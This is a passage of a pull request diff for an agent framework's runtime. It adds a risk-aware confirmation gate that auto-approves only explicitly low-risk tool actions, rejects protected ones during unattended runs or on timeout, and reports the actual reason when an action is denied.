### PR TITLE
feat(runtime): keep intercepting protected actions in low-risk auto mode

### DIFF
--- a/agenticx/cli/agent_tools.py
+++ b/agenticx/cli/agent_tools.py
@@ -48,10 +48,11 @@ from agenticx.skills.guard import scan_skill, should_allow
 from agenticx.tools.skill_bundle import SkillBundleLoader
 from agenticx.tools.adapters.video_frames import VideoFrameExtractor
 from agenticx.runtime.confirm import (
-    AsyncConfirmGate,
-    AutoApproveConfirmGate,
     ConfirmGate,
     SyncConfirmGate,
+    confirm_denial_note,
+    is_protected_confirm,
+    protected_confirm_reason,
 )
 from agenticx.runtime.clarify import (
     AsyncClarifyGate,
@@ -2581,7 +2582,7 @@ async def _tool_desktop_screenshot(
         context={"tool": "desktop_screenshot", "risk": "computer_use"},
         emit_event=emit_event,
     ):
-        return "CANCELLED: user denied desktop screenshot"
+        return _cancelled("桌面截屏未执行", confirm_gate)
     include_b64 = arguments.get("include_base64")
     if include_b64 is None:
         include_b64 = True
@@ -2643,7 +2644,7 @@ async def _tool_desktop_mouse_click(
         context={"tool": "desktop_mouse_click", "risk": "computer_use", "x": x, "y": y},
         emit_event=emit_event,
     ):
-        return "CANCELLED: user denied desktop mouse click"
+        return _cancelled("桌面点击未执行", confirm_gate)
 
     def _run() -> str:
         import pyautogui  # type: ignore import-not-found
@@ -2694,7 +2695,7 @@ async def _tool_desktop_keyboard_type(
         context={"tool": "desktop_keyboard_type", "risk": "computer_use"},
         emit_event=emit_event,
     ):
-        return "CANCELLED: user denied desktop keyboard typing"
+        return _cancelled("桌面键入未执行", confirm_gate)
 
     def _run() -> None:
         import pyautogui  # type: ignore import-not-found
@@ -2736,6 +2737,19 @@ META_TOOL_NAMES = {
 }
 
 
+def _cancelled(what: str, confirm_gate: ConfirmGate) -> str:
+    """CANCELLED 文案，带上「为什么没通过」。
+
+    以前一律写 user denied。无人值守跑批时根本没人在场，用户回头看日志会去找一个
+    不存在的点击；等待超时同理。原因由 _confirm 在拒绝时挂到 gate 上。
+    """
+
+    note = getattr(confirm_gate, "last_denial_note", "")
+    if not isinstance(note, str) or not note.strip():
+        note = "用户拒绝"
+    return f"CANCELLED: {what}（{note.strip()}）"
+
+
 async def _confirm(
     question: str,
     *,
@@ -2746,6 +2760,10 @@ async def _confirm(
     payload_context = dict(context or {})
     request_id = str(payload_context.get("request_id") or uuid.uuid4())
     payload_context["request_id"] = request_id
+    # 受保护的请求带上「为什么问你」。界面自己也能按 risk 推，但理由由后端给出才有
+    # 唯一出处——risk 取值将来加一个，不用记得同步改两处文案。
+    if is_protected_confirm(payload_context):
+        payload_context["protected_reason"] = protected_confirm_reason(payload_context)
     _log.info(
         "[confirm] requested id=%s question=%s risk=%s tool=%s",
         request_id,
@@ -2753,23 +2771,40 @@ async def _confirm(
         payload_context.get("risk"),
         payload_context.get("tool"),
     )
-    # IMPORTANT: do not emit confirm_required when the gate auto-approves.
-    # Otherwise IM adapters (Feishu/WeChat) will still prompt /approve even though
-    # request_confirm() returns immediately (e.g. AutoApproveConfirmGate).
-    emit_prompt = emit_event is not None and isinstance(confirm_gate, AsyncConfirmGate)
+    # Gate capability, rather than concrete type, decides whether an event is
+    # needed. A risk-aware auto gate emits only for protected interactive work;
+    # low-risk and unattended requests must not create phantom UI prompts.
+    emit_prompt = emit_event is not None and confirm_gate.should_emit_prompt(payload_context)
     if emit_prompt:
-        await emit_event(
-            {
-                "type": "confirm_required",
-                "data": {
-                    "id": request_id,
-                    "question": question,
-                    "context": payload_context,
-                },
-            }
+        # Register the pending request before publishing its ID. Otherwise a
+        # fast UI callback can arrive before AsyncConfirmGate.resolve() has a
+        # future to resolve and the turn hangs until timeout.
+        confirm_task = asyncio.create_task(
+            confirm_gate.request_confirm(question, payload_context)
         )
-    approved = await confirm_gate.request_confirm(question, payload_context)
+        await asyncio.sleep(0)
+        try:
+            await emit_event(
+                {
+                    "type": "confirm_required",
+                    "data": {
+                        "id": request_id,
+                        "question": question,
+                        "context": payload_context,
+                    },
+                }
+            )
+            approved = await confirm_task
+        except BaseException:
+            confirm_task.cancel()
+            await asyncio.gather(confirm_task, return_exceptions=True)
+            raise
+    else:
+        approved = await confirm_gate.request_confirm(question, payload_context)
     _log.info("[confirm] resolved id=%s approved=%s", request_id, approved)
+    if not approved:
+        # 调用方拼 CANCELLED 文案时读这一条：是人按的拒绝，还是无人值守直接拦下的。
+        setattr(confirm_gate, "last_denial_note", confirm_denial_note(confirm_gate, request_id))
     if emit_prompt:
         await emit_event(
             {
@@ -3953,7 +3988,7 @@ async def _bash_exec_prepare(
             context={"tool": tool_name, "command": command, "risk": "non_whitelisted"},
             emit_event=emit_event,
         ):
-            return "CANCELLED: user denied non-whitelisted command"
+            return _cancelled("非白名单命令未执行", confirm_gate)
 
     if _command_touches_protected_config(command, parts):
         return (
@@ -4006,7 +4041,7 @@ async def _bash_exec_prepare(
             },
             emit_event=emit_event,
         ):
-            return "CANCELLED: user denied high-risk command"
+            return _cancelled("高风险命令未执行", confirm_gate)
 
     use_shell = bool(re.search(r"(;|&&|\|\||\||`|\$\(|>|<|\n)", command))
     if not use_shell:
@@ -4661,10 +4696,10 @@ async def _tool_file_write(
     if not await _confirm(
         f"Write changes to {path}?",
         confirm_gate=confirm_gate,
-        context={"tool": "file_write", "path": str(path), "diff": diff},
+        context={"tool": "file_write", "path": str(path), "diff": diff, "risk": "low"},
         emit_event=emit_event,
     ):
-        return "CANCELLED: user denied file write"
+        return _cancelled("文件未写入", confirm_gate)
 
     try:
         path.parent.mkdir(parents=True, exist_ok=True)
@@ -4742,10 +4777,10 @@ async def _tool_file_edit(
     if not await _confirm(
         f"Apply edit to {path}?",
         confirm_gate=confirm_gate,
-        context={"tool": "file_edit", "path": str(path), "diff": diff},
+        context={"tool": "file_edit", "path": str(path), "diff": diff, "risk": "low"},
         emit_event=emit_event,
     ):
-        return "CANCELLED: user denied file edit"
+        return _cancelled("文件未修改", confirm_gate)
 
     try:
         path.write_text(updated_text, encoding="utf-8")
@@ -4797,19 +4832,19 @@ async def _tool_codegen(
             output_path = _resolve_workspace_path(str(inferred), session)
         except ValueError as exc:
             return f"ERROR: inferred output path invalid: {exc}"
-        should_confirm = isinstance(confirm_gate, AsyncConfirmGate) or sys.stdin.isatty()
+        should_confirm = confirm_gate.is_service_mode() or sys.stdin.isatty()
         if should_confirm and not await _confirm(
             (
                 "未检测到你显式指定落盘目录。"
                 f"建议写入：{output_path}。是否确认按该路径生成？"
             ),
             confirm_gate=confirm_gate,
-            context={"tool": "codegen", "path": str(output_path), "target": target},
+            context={"tool": "codegen", "path": str(output_path), "target": target, "risk": "low"},
             emit_event=emit_event,
         ):
             return (
-                "CANCELLED: user denied inferred codegen path. "
-                "Please provide output_path explicitly, e.g. "
+                _cancelled("推断的落盘路径未获批准", confirm_gate)
+                + " Please provide output_path explicitly, e.g. "
                 '{"target":"agent","description":"...","output_path":"./docs/xxx.md"}'
             )
     try:
@@ -5824,10 +5859,10 @@ async def _tool_memory_append(
         if not await _confirm(
             "Append preference to global USER.md (all subjects)?",
             confirm_gate=confirm_gate,
-            context={"tool": "memory_append", "scope": scope, "preview": content[:200]},
+            context={"tool": "memory_append", "scope": scope, "preview": content[:200], "risk": "policy"},
             emit_event=emit_event,
         ):
-            return "CANCELLED: user denied memory append"
+            return _cancelled("记忆未写入", confirm_gate)
         append_user_global_preference(content)
         workspace_dir = resolve_workspace_dir()
     else:
@@ -5837,10 +5872,10 @@ async def _tool_memory_append(
             if not await _confirm(
                 "Append note into this subject's long-term MEMORY.md?",
                 confirm_gate=confirm_gate,
-                context={"tool": "memory_append", "target": target, "preview": content[:200]},
+                context={"tool": "memory_append", "target": target, "preview": content[:200], "risk": "policy"},
                 emit_event=emit_event,
             ):
-                return "CANCELLED: user denied memory append"
+                return _cancelled("记忆未写入", confirm_gate)
             append_long_term_memory(workspace_dir, content)
         else:
             memory_dir = workspace_dir / "memory"
@@ -7215,7 +7250,11 @@ async def _tool_skill_manage(
         )
     # Interactive mode: user approves/rejects inline in the chat.
     # Non-interactive (e.g. session_review_hook): falls back to pending queue.
-    _interactive = emit_event is not None and isinstance(confirm_gate, AsyncConfirmGate)
+    _interactive = (
+        emit_event is not None
+        and confirm_gate is not None
+        and confirm_gate.is_service_mode()
+    )
     action = str(arguments.get("action", "") or "").strip().lower()
     if not action:
         return (
@@ -7261,7 +7300,7 @@ async def _tool_skill_manage(
             approved = await _confirm(
                 f"skill_manage 请求**创建**新技能「{name}」\n\n内容预览：\n\n```\n{preview}\n```\n\n确认写入 `~/.agenticx/skills/{name}/SKILL.md`？",
                 confirm_gate=confirm_gate,  # type: ignore[arg-type]
-                context={"tool": "skill_manage", "action": "create", "skill": name},
+                context={"tool": "skill_manage", "action": "create", "skill": name, "risk": "policy"},
                 emit_event=emit_event,
             )
             if not approved:
@@ -7440,7 +7479,7 @@ async def _tool_skill_manage(
                 f"**新内容：**\n```\n{new_preview}\n```\n\n"
                 f"确认应用补丁？",
                 confirm_gate=confirm_gate,  # type: ignore[arg-type]
-                context={"tool": "skill_manage", "action": "patch", "skill": name},
+                context={"tool": "skill_manage", "action": "patch", "skill": name, "risk": "policy"},
                 emit_event=emit_event,
             )
             if not approved:
@@ -8454,7 +8493,7 @@ async def dispatch_tool_async(
         if name == "code_index_cancel":
             return await asyncio.to_thread(_tool_code_index_cancel, arguments, session)
         if name == "ask_user":
-            return _tool_ask_user(arguments, service_mode=isinstance(gate, AsyncConfirmGate))
+            return _tool_ask_user(arguments, service_mode=gate.is_service_mode())
         if name == "request_clarification":
             prompt = str(arguments.get("prompt", "") or "").strip()
             if not prompt:

--- a/agenticx/runtime/__init__.py
+++ b/agenticx/runtime/__init__.py
@@ -1,7 +1,19 @@
 """Runtime core exports."""
 
 from agenticx.runtime.clarify import AsyncClarifyGate, AutoSuspendClarifyGate, ClarifyGate
-from agenticx.runtime.confirm import AutoApproveConfirmGate, AsyncConfirmGate, ConfirmGate, SyncConfirmGate
+from agenticx.runtime.confirm import (
+    CONFIRM_RISK_LOW,
+    PROTECTED_CONFIRM_RISKS,
+    AutoApproveConfirmGate,
+    AsyncConfirmGate,
+    ConfirmGate,
+    RiskAwareAutoConfirmGate,
+    SyncConfirmGate,
+    confirm_denial_note,
+    is_protected_confirm,
+    normalize_confirm_risk,
+    protected_confirm_reason,
+)
 from agenticx.runtime.events import EventType, RuntimeEvent
 from agenticx.runtime.scratchpad import Scratchpad
 from agenticx.runtime.todo_manager import TodoManager
@@ -56,6 +68,13 @@ __all__ = [
     "SyncConfirmGate",
     "AsyncConfirmGate",
     "AutoApproveConfirmGate",
+    "RiskAwareAutoConfirmGate",
+    "CONFIRM_RISK_LOW",
+    "PROTECTED_CONFIRM_RISKS",
+    "normalize_confirm_risk",
+    "is_protected_confirm",
+    "protected_confirm_reason",
+    "confirm_denial_note",
     "ClarifyGate",
     "AsyncClarifyGate",
     "AutoSuspendClarifyGate",

--- a/agenticx/runtime/confirm.py
+++ b/agenticx/runtime/confirm.py
@@ -16,6 +16,78 @@ from typing import Any, Dict, Optional
 _log = logging.getLogger(__name__)
 
 _VALID_TIMEOUT_ACTIONS = frozenset({"approve", "reject", "skip"})
+CONFIRM_RISK_LOW = "low"
+PROTECTED_CONFIRM_RISKS = frozenset(
+    {"high", "destructive", "computer_use", "non_whitelisted", "policy"}
+)
+
+
+def normalize_confirm_risk(context: Optional[Dict[str, Any]] = None) -> str:
+    """Normalize risk for auto-confirm decisions.
+
+    Only an explicit ``risk=low`` is eligible for automatic approval. Missing,
+    unknown, or misspelled values are intentionally treated as protected so a
+    newly added tool cannot silently bypass confirmation.
+    """
+
+    raw_risk = (context or {}).get("risk")
+    if isinstance(raw_risk, str) and raw_risk.strip().lower() == CONFIRM_RISK_LOW:
+        return CONFIRM_RISK_LOW
+    return "protected"
+
+
+def is_protected_confirm(context: Optional[Dict[str, Any]] = None) -> bool:
+    """Return whether a confirmation must not be auto-approved."""
+
+    return normalize_confirm_risk(context) != CONFIRM_RISK_LOW
+
+
+#: 为什么这一步会被拦下来。自动模式下弹出确认时，用户的第一反应是「我不是开了全自动
+#: 吗，这个怎么还问我」——不给出理由，他下次就会把整个功能关掉。
+PROTECTED_CONFIRM_REASONS: Dict[str, str] = {
+    "high": "这条操作被标记为高风险",
+    "destructive": "这条操作会删除或覆盖已有内容",
+    "computer_use": "这条操作会读取或控制本机桌面",
+    "non_whitelisted": "这条命令不在默认可直接执行的白名单里",
+    "policy": "这条操作会改动技能或长期记忆等配置",
+}
+UNKNOWN_PROTECTED_CONFIRM_REASON = "系统无法判定这步的风险，按受保护处理"
+
+
+def protected_confirm_reason(context: Optional[Dict[str, Any]] = None) -> str:
+    """One line explaining why a request cannot be auto-approved.
+
+    Unknown/missing risks intentionally get a reason too: fail-closed means new
+    tools land here by default, and "no explanation" is exactly what makes an
+    unexplained prompt feel like a bug.
+    """
+
+    if not is_protected_confirm(context):
+        return ""
+    raw = (context or {}).get("risk")
+    key = raw.strip().lower() if isinstance(raw, str) else ""
+    return PROTECTED_CONFIRM_REASONS.get(key, UNKNOWN_PROTECTED_CONFIRM_REASON)
+
+
+def confirm_denial_note(gate: Any, request_id: str) -> str:
+    """Why a confirmation came back denied.
+
+    「用户拒绝了」和「无人值守下策略直接拦下」对使用者是两件事：前者他自己按的，
+    后者他根本没在场。工具结果里一律写 user denied，会让人回头去找一个不存在的点击。
+    """
+
+    last = getattr(gate, "last_request", None)
+    if isinstance(last, dict) and last.get("id") == request_id:
+        if last.get("decision") == "blocked_unattended":
+            return "无人值守运行不批准受保护操作"
+    timeout_info = getattr(gate, "last_timeout_info", None)
+    if (
+        isinstance(timeout_info, dict)
+        and timeout_info.get("request_id") == request_id
+        and not timeout_info.get("approved")
+    ):
+        return "等待确认超时"
+    return "用户拒绝"
 
 
 def _resolve_confirm_timeout_seconds() -> float:
@@ -37,6 +109,21 @@ class ConfirmGate(ABC):
     @abstractmethod
     async def request_confirm(self, question: str, context: Optional[Dict[str, Any]] = None) -> bool:
         """Request user confirmation and return approval."""
+
+    def should_emit_prompt(self, context: Optional[Dict[str, Any]] = None) -> bool:
+        """Whether the caller should publish a user-facing confirmation event."""
+
+        return False
+
+    def is_service_mode(self) -> bool:
+        """Whether this gate is driven by an HTTP/SSE service adapter."""
+
+        return False
+
+    def resolve(self, request_id: str, approved: bool) -> bool:
+        """Resolve a pending confirmation when supported by the gate."""
+
+        return False
 
     def export_state(self) -> Dict[str, Any]:
         """Export serializable pending-confirmation state for checkpoints."""
@@ -99,11 +186,15 @@ class AsyncConfirmGate(ConfirmGate):
         try:
             return await asyncio.wait_for(future, timeout=self.timeout_seconds)
         except asyncio.TimeoutError:
-            approved = self.timeout_action == "approve"
+            effective_action = (
+                "reject" if is_protected_confirm(payload) else self.timeout_action
+            )
+            approved = effective_action == "approve"
             self.last_timeout_info = {
                 "request_id": request_id,
                 "question": question,
-                "action_taken": self.timeout_action,
+                "action_taken": effective_action,
+                "configured_action": self.timeout_action,
                 "approved": approved,
                 "timeout_seconds": self.timeout_seconds,
             }
@@ -111,7 +202,7 @@ class AsyncConfirmGate(ConfirmGate):
                 "Confirm gate timed out after %.1fs for request %s, action=%s",
                 self.timeout_seconds,
                 request_id,
-                self.timeout_action,
+                effective_action,
             )
             if not future.done():
                 future.cancel()
@@ -174,9 +265,77 @@ class AsyncConfirmGate(ConfirmGate):
         if isinstance(last_request, dict):
             self.last_request = last_request
 
+    def should_emit_prompt(self, context: Optional[Dict[str, Any]] = None) -> bool:
+        return True
+
+    def is_service_mode(self) -> bool:
+        return True
+
+
+class RiskAwareAutoConfirmGate(ConfirmGate):
+    """Auto-approve explicit low-risk requests while protecting everything else.
+
+    Interactive callers may supply a managed delegate so protected requests are
+    surfaced to the user. Unattended callers deliberately reject protected
+    requests immediately instead of creating a pending future that can hang an
+    automation indefinitely.
+    """
+
+    def __init__(
+        self,
+        delegate: Optional[ConfirmGate] = None,
+        *,
+        unattended: bool = False,
+    ) -> None:
+        self.delegate = delegate
+        self.unattended = bool(unattended)
+        self._pending = getattr(delegate, "_pending", {})
+        self.last_request: Optional[Dict[str, Any]] = None
+
+    async def request_confirm(self, question: str, context: Optional[Dict[str, Any]] = None) -> bool:
+        payload = dict(context or {})
+        if not is_protected_confirm(payload):
+            self.last_request = None
+            return True
+
+        request_id = str(payload.get("request_id") or uuid.uuid4())
+        payload["request_id"] = request_id
+        self.last_request = {
+            "id": request_id,
+            "question": question,
+            "context": payload,
+        }
+        if self.unattended or self.delegate is None:
+            self.last_request["decision"] = "blocked_unattended"
+            return False
+
+        approved = await self.delegate.request_confirm(question, payload)
+        self.last_request = getattr(self.delegate, "last_request", None)
+        return approved
+
+    def should_emit_prompt(self, context: Optional[Dict[str, Any]] = None) -> bool:
+        return (
+            not self.unattended
+            and self.delegate is not None
+            and is_protected_confirm(context)
+            and self.delegate.should_emit_prompt(context)
+        )
+
+    def is_service_mode(self) -> bool:
+        return True
+
+    def resolve(self, request_id: str, approved: bool) -> bool:
+        if self.delegate is None:
+            return False
+        return self.delegate.resolve(request_id, approved)
+
 
 class AutoApproveConfirmGate(ConfirmGate):
-    """Always approve confirmation requests (best for autonomous sub-agents)."""
+    """Legacy unconditional gate.
+
+    Production unattended paths must use :class:`RiskAwareAutoConfirmGate`.
+    This class remains for backwards compatibility with external integrations.
+    """
 
     def __init__(self) -> None:
         self._pending: Dict[str, asyncio.Future[bool]] = {}

--- a/agenticx/runtime/group_router.py
+++ b/agenticx/runtime/group_router.py
@@ -22,7 +22,7 @@ from agenticx.avatar.registry import AvatarRegistry
 from agenticx.cli.agent_tools import STUDIO_TOOLS
 from agenticx.cli.studio import StudioSession
 from agenticx.runtime import AgentRuntime
-from agenticx.runtime import AsyncClarifyGate, AsyncConfirmGate
+from agenticx.runtime import AsyncClarifyGate, AsyncConfirmGate, ConfirmGate
 from agenticx.runtime.events import EventType
 from agenticx.runtime.group_context import GroupChatContext
 from agenticx.runtime.group_facts import (
@@ -454,6 +454,7 @@ class GroupReply:
     error: str = ""
     event_type: str = "group_reply"
     confirm_request_id: str = ""
+    confirm_context: Dict[str, Any] = field(default_factory=dict)
     # Structured fields for graph projection / member activity side panel.
     graph_run_id: str = ""
     graph_node_id: str = ""
@@ -513,7 +514,7 @@ class GroupChatRouter:
         llm_factory: Callable[[str | None, str | None], Any],
         max_tool_rounds: int,
         meta_leader_display_name: str | None = None,
-        confirm_gate_factory: Callable[[str], "AsyncConfirmGate"] | None = None,
+        confirm_gate_factory: Callable[[str], ConfirmGate] | None = None,
         clarify_gate_factory: Callable[[str], "AsyncClarifyGate"] | None = None,
     ) -> None:
         self.avatar_registry = avatar_registry
@@ -1621,6 +1622,14 @@ class GroupChatRouter:
                         if group_evt_type in ("group_blocked", "group_clarification")
                         else ""
                     )
+                    raw_confirm_context = (
+                        event.data.get("context") if group_evt_type == "group_blocked" else None
+                    )
+                    confirm_context = (
+                        dict(raw_confirm_context)
+                        if isinstance(raw_confirm_context, dict)
+                        else {}
+                    )
                     tool_step = self._runtime_event_to_tool_step(event.type, event.data)
                     tool_detail = self._runtime_event_to_tool_detail(event.type, event.data)
                     raw_opts = event.data.get("options") if group_evt_type == "group_clarification" else None
@@ -1640,6 +1649,7 @@ class GroupChatRouter:
                             skipped=True,
                             event_type=group_evt_type,
                             confirm_request_id=confirm_request_id,
+                            confirm_context=confirm_context,
                             graph_run_id=graph_run_id,
                             graph_node_id=graph_node_id,
                             tool_name=tool_step.get("tool_name", ""),

--- a/agenticx/runtime/team_manager.py
+++ b/agenticx/runtime/team_manager.py
@@ -24,10 +24,10 @@ from agenticx.cli.studio import StudioSession
 from agenticx.llms.provider_resolver import ProviderResolver
 from agenticx.runtime import (
     AgentRuntime,
-    AutoApproveConfirmGate,
     AsyncClarifyGate,
-    AsyncConfirmGate,
+    ConfirmGate,
     EventType,
+    RiskAwareAutoConfirmGate,
     RuntimeEvent,
 )
 from agenticx.runtime.prompts.current_time import build_current_time_block
@@ -123,7 +123,9 @@ class SubAgentContext:
     agent_messages: List[Dict[str, Any]] = field(default_factory=list)
     artifacts: Dict[Path, str] = field(default_factory=dict)
     context_files: Dict[str, str] = field(default_factory=dict)
-    confirm_gate: AsyncConfirmGate = field(default_factory=AsyncConfirmGate)
+    confirm_gate: ConfirmGate = field(
+        default_factory=lambda: RiskAwareAutoConfirmGate(unattended=True)
+    )
     clarify_gate: AsyncClarifyGate = field(default_factory=AsyncClarifyGate)
     result_summary: str = ""
     created_at: float = field(default_factory=time.time)
@@ -170,6 +172,7 @@ class AgentTeamManager:
         max_concurrent_subagents: int = 4,
         resource_monitor: Optional[ResourceMonitor] = None,
         spawn_config: Optional[SpawnConfig] = None,
+        confirm_gate_factory: Optional[Callable[[str], ConfirmGate]] = None,
     ) -> None:
         self._manager_id = uuid.uuid4().hex
         AgentTeamManager._registry[self._manager_id] = self
@@ -181,6 +184,9 @@ class AgentTeamManager:
         self.max_concurrent_subagents = max_concurrent_subagents
         self.resource_monitor = resource_monitor or ResourceMonitor()
         self.spawn_config = spawn_config or SpawnConfig(max_concurrent=max_concurrent_subagents)
+        self.confirm_gate_factory = confirm_gate_factory or (
+            lambda _agent_id: RiskAwareAutoConfirmGate(unattended=True)
+        )
 
         self._lock = asyncio.Lock()
         self._agents: Dict[str, SubAgentContext] = {}
@@ -561,7 +567,7 @@ class AgentTeamManager:
                 task=task.strip(),
                 source_tool_call_id=source_tool_call_id,
                 context_files=dict(self.base_session.context_files),
-                confirm_gate=AutoApproveConfirmGate(),
+                confirm_gate=self.confirm_gate_factory(agent_id),
                 parent_agent_id=parent_agent_id,
                 depth=parent_depth + 1,
                 mode=resolved_mode,
@@ -1082,7 +1088,7 @@ class AgentTeamManager:
         )
         return {"ok": True, "subagents": merged_rows}
 
-    def get_confirm_gate(self, agent_id: str) -> Optional[AsyncConfirmGate]:
+    def get_confirm_gate(self, agent_id: str) -> Optional[ConfirmGate]:
         context = self._agents.get(agent_id)
         if context is None:
             return None
@@ -1115,9 +1121,12 @@ class AgentTeamManager:
 
     def _serialize_status(self, context: SubAgentContext) -> Dict[str, Any]:
         pending_confirm = None
-        if context.confirm_gate and context.confirm_gate.last_request:
-            req = context.confirm_gate.last_request
-            if context.confirm_gate._pending.get(str(req.get("id", ""))):
+        confirm_gate = context.confirm_gate
+        confirm_request = getattr(confirm_gate, "last_request", None)
+        confirm_pending = getattr(confirm_gate, "_pending", {})
+        if confirm_request and isinstance(confirm_pending, dict):
+            req = confirm_request
+            if confirm_pending.get(str(req.get("id", ""))):
                 pending_confirm = {
                     "request_id": req.get("id", ""),
                     "question": req.get("question", ""),

--- a/agenticx/studio/protocols.py
+++ b/agenticx/studio/protocols.py
@@ -47,6 +47,9 @@ class ChatRequest(BaseModel):
     skip_user_history: Optional[bool] = False
     # Internal: allow runtime to continue even if SSE client disconnects (IM confirm flow).
     keep_runtime_after_disconnect: Optional[bool] = False
+    # Internal: automatic/supervised turn with no human available to answer a
+    # protected confirmation. Low-risk work may proceed; protected work fails closed.
+    unattended_run: Optional[bool] = False
     # Skill slugs referenced via @skill:// tokens in the user message; content injected into context.
     skill_slugs: Optional[List[str]] = None
     # Per-session KB retrieval mode override ("auto" | "always"). When set, this

--- a/agenticx/studio/server.py
+++ b/agenticx/studio/server.py
@@ -66,7 +66,7 @@ from agenticx.cli.studio_mcp import (
 )
 from agenticx.llms.provider_resolver import ProviderResolver, effective_session_llm_names
 from agenticx.llms.sampling_params import provider_raw_enabled_for_fallback
-from agenticx.runtime import AgentRuntime, AutoApproveConfirmGate, AutoSuspendClarifyGate
+from agenticx.runtime import AgentRuntime, AutoSuspendClarifyGate, RiskAwareAutoConfirmGate
 from agenticx.runtime.auto_solve import AutoSolveMode
 from agenticx.runtime.events import EventType, RuntimeEvent, normalize_tool_sse_payload
 from agenticx.runtime.loop_controller import LoopController
@@ -999,6 +999,7 @@ def create_studio_app() -> FastAPI:
                 session_id=sid,
                 user_input=prompt,
                 skip_user_history=True,
+                unattended_run=source == "supervisor",
                 provider=managed.studio_session.provider_name,
                 model=managed.studio_session.model_name,
             )
@@ -1267,10 +1268,18 @@ def create_studio_app() -> FastAPI:
             mode = ""
         return mode in {"auto", "full_auto"}
 
-    def _resolve_confirm_gate(managed: Any, agent_id: str = "meta") -> Any:
+    def _resolve_confirm_gate(
+        managed: Any,
+        agent_id: str = "meta",
+        *,
+        unattended: bool = False,
+    ) -> Any:
+        if unattended:
+            return RiskAwareAutoConfirmGate(unattended=True)
+        managed_gate = managed.get_confirm_gate(agent_id)
         if _global_auto_confirm_enabled():
-            return AutoApproveConfirmGate()
-        return managed.get_confirm_gate(agent_id)
+            return RiskAwareAutoConfirmGate(delegate=managed_gate)
+        return managed_gate
 
     def _resolve_clarify_gate(managed: Any, agent_id: str = "meta", *, is_automation: bool = False) -> Any:
         # Clarification must NEVER be auto-approved (that would drop the user's
@@ -2645,6 +2654,9 @@ def create_studio_app() -> FastAPI:
             manager.auto_title_session(payload.session_id, payload.user_input)
 
         session = managed.studio_session
+        active_avatar_id = str(getattr(managed, "avatar_id", "") or "").strip()
+        is_automation_session = active_avatar_id.startswith("automation:")
+        turn_is_unattended = bool(getattr(payload, "unattended_run", False)) or is_automation_session
         try:
             from agenticx.runtime.prompts.code_mode import ensure_code_dev_workflow_skill
 
@@ -2943,7 +2955,14 @@ def create_studio_app() -> FastAPI:
                 team_manager = managed.team_manager or getattr(session, "_team_manager", None)
                 if team_manager is None:
                     try:
-                        team_manager = managed.get_or_create_team(llm_factory=_resolve_llm)
+                        team_manager = managed.get_or_create_team(
+                            llm_factory=_resolve_llm,
+                            confirm_gate_factory=lambda agent_id: _resolve_confirm_gate(
+                                managed,
+                                agent_id,
+                                unattended=turn_is_unattended,
+                            ),
+                        )
                         setattr(session, "_team_manager", team_manager)
                     except Exception as exc:
                         err = SseEvent(type="error", data={"agent_id": target_agent_id, "text": f"子智能体团队尚未初始化: {exc}"})
@@ -3077,8 +3096,16 @@ def create_studio_app() -> FastAPI:
                         llm_factory=llm_factory,
                         max_tool_rounds=_resolve_max_tool_rounds(),
                         meta_leader_display_name=meta_leader_label,
-                        confirm_gate_factory=lambda agent_id: _resolve_confirm_gate(managed, agent_id),
-                        clarify_gate_factory=lambda agent_id: _resolve_clarify_gate(managed, agent_id),
+                        confirm_gate_factory=lambda agent_id: _resolve_confirm_gate(
+                            managed,
+                            agent_id,
+                            unattended=turn_is_unattended,
+                        ),
+                        clarify_gate_factory=lambda agent_id: _resolve_clarify_gate(
+                            managed,
+                            agent_id,
+                            is_automation=turn_is_unattended,
+                        ),
                     )
                     quoted_content = str(payload.quoted_content or "")
                     quoted_message_id = str(payload.quoted_message_id or "")
@@ -3153,6 +3180,7 @@ def create_studio_app() -> FastAPI:
                                 "skipped": reply.skipped,
                                 "error": reply.error,
                                 "confirm_request_id": str(getattr(reply, "confirm_request_id", "") or ""),
+                                "confirm_context": dict(getattr(reply, "confirm_context", None) or {}),
                                 "graph_run_id": str(getattr(reply, "graph_run_id", "") or ""),
                                 "graph_node_id": str(getattr(reply, "graph_node_id", "") or ""),
                                 "tool_name": str(getattr(reply, "tool_name", "") or ""),
@@ -3363,6 +3391,11 @@ def create_studio_app() -> FastAPI:
             llm_factory=_resolve_llm,
             event_emitter=_on_team_event,
             summary_sink=_on_subagent_summary,
+            confirm_gate_factory=lambda agent_id: _resolve_confirm_gate(
+                managed,
+                agent_id,
+                unattended=turn_is_unattended,
+            ),
         )
         setattr(session, "_team_manager", team_manager)
         setattr(session, "_session_manager", manager)
@@ -3374,18 +3407,22 @@ def create_studio_app() -> FastAPI:
             list(team_manager._agents.keys()) if team_manager else [],
         )
         setattr(session, "_session_id", payload.session_id)
-        active_avatar_id = str(getattr(managed, "avatar_id", "") or "").strip()
-        is_automation_session = active_avatar_id.startswith("automation:")
         try:
             load_discovered_hooks()
         except Exception as exc:
             logger.debug("Skipping discovered hooks loading for chat: %s", exc)
-        # Desktop 定时/立即执行由主进程拉 SSE，无法像 ChatPane 那样响应 confirm_required；
-        # 无人值守会话必须自动放行 bash_exec 等工具确认，否则会永久卡住。
-        meta_confirm_gate = (
-            AutoApproveConfirmGate() if is_automation_session else _resolve_confirm_gate(managed, "meta")
+        # No human is available during automation/supervisor turns. Explicit
+        # low-risk requests may proceed, while protected requests fail closed.
+        meta_confirm_gate = _resolve_confirm_gate(
+            managed,
+            "meta",
+            unattended=turn_is_unattended,
         )
-        meta_clarify_gate = _resolve_clarify_gate(managed, "meta", is_automation=is_automation_session)
+        meta_clarify_gate = _resolve_clarify_gate(
+            managed,
+            "meta",
+            is_automation=turn_is_unattended,
+        )
         from agenticx.studio.turn_interruption import clear_stale_unattended_failure
 
         clear_stale_unattended_failure(session)
@@ -3401,7 +3438,7 @@ def create_studio_app() -> FastAPI:
                 max_tool_rounds=_resolve_max_tool_rounds(),
                 mid_turn_persist=_mid_turn_persist_cb,
                 clarify_gate=meta_clarify_gate,
-                is_unattended=is_automation_session,
+                is_unattended=turn_is_unattended,
                 llm_factory=_resolve_llm,
             )
         except TypeError:
@@ -4112,6 +4149,7 @@ def create_studio_app() -> FastAPI:
                     provider=managed.studio_session.provider_name,
                     model=managed.studio_session.model_name,
                     keep_runtime_after_disconnect=True,
+                    unattended_run=source in {"desktop_auto_nudge", "supervisor"},
                 )
                 inner = await chat(chat_payload, request, x_agx_desktop_token)
                 if inner.body_iterator is not None:
@@ -4351,20 +4389,27 @@ def create_studio_app() -> FastAPI:
                 pass
 
         loop_is_automation = str(getattr(managed, "avatar_id", "") or "").startswith("automation:")
+        loop_is_unattended = loop_is_automation or bool(payload.get("unattended_run", False))
+        if loop_tm is not None:
